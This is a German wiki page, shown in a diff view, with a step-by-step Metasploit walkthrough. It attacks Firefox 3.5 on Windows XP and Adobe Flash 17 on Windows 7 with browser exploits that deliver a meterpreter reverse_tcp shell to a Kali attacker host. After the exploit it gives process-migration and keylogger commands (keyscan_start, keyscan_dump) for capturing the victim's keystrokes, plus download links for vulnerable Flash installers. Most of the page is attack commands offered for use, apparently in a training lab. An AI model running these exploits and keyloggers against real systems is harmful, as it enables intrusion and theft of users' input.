Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 48: Zeile 48:
  
 
=Win7 32bit Exploit=
 
=Win7 32bit Exploit=
rity.blogspot.de/2015/05/exploiting-flash-1700134-using.html
+
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html
  
  

Version vom 20. Oktober 2015, 12:17 Uhr

Links

Setup Opfer

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

vorgehen

starte metasploit

msfconsole
use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp/
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert 
session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_18.0.0.203_archive.zip

https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_17.0.0.134_archive.zip


rity.blogspot.de/2015/05/exploiting-flash-1700134-using.html

Win7 32bit Exploit

http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html


  • Setup Opfer

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

Hackersystem

kali linux

ip 192.168.244.50

auf der konsole

metasploit konsole starten

  • msfconsole

auswahl des exploits

  • use exploit/windows/browser/adobe_flash_domain_memory_uaf

auswahl der schadsoftware

  • set payload windows/meterpreter/reverse_tcp

setzen des localhost

  • set lhost 192.168.244.50

setzen des webservers

  • set srvhost 192.168.244.50

pfad zum hack

  • set uripath /hack

ausführen des exploits

  • exploit

auf dem opfer

auf dem hackersystem

commandos=

sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

vorgehnsweise

session betreten

  • msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1

ps listing

  • meterpreter > ps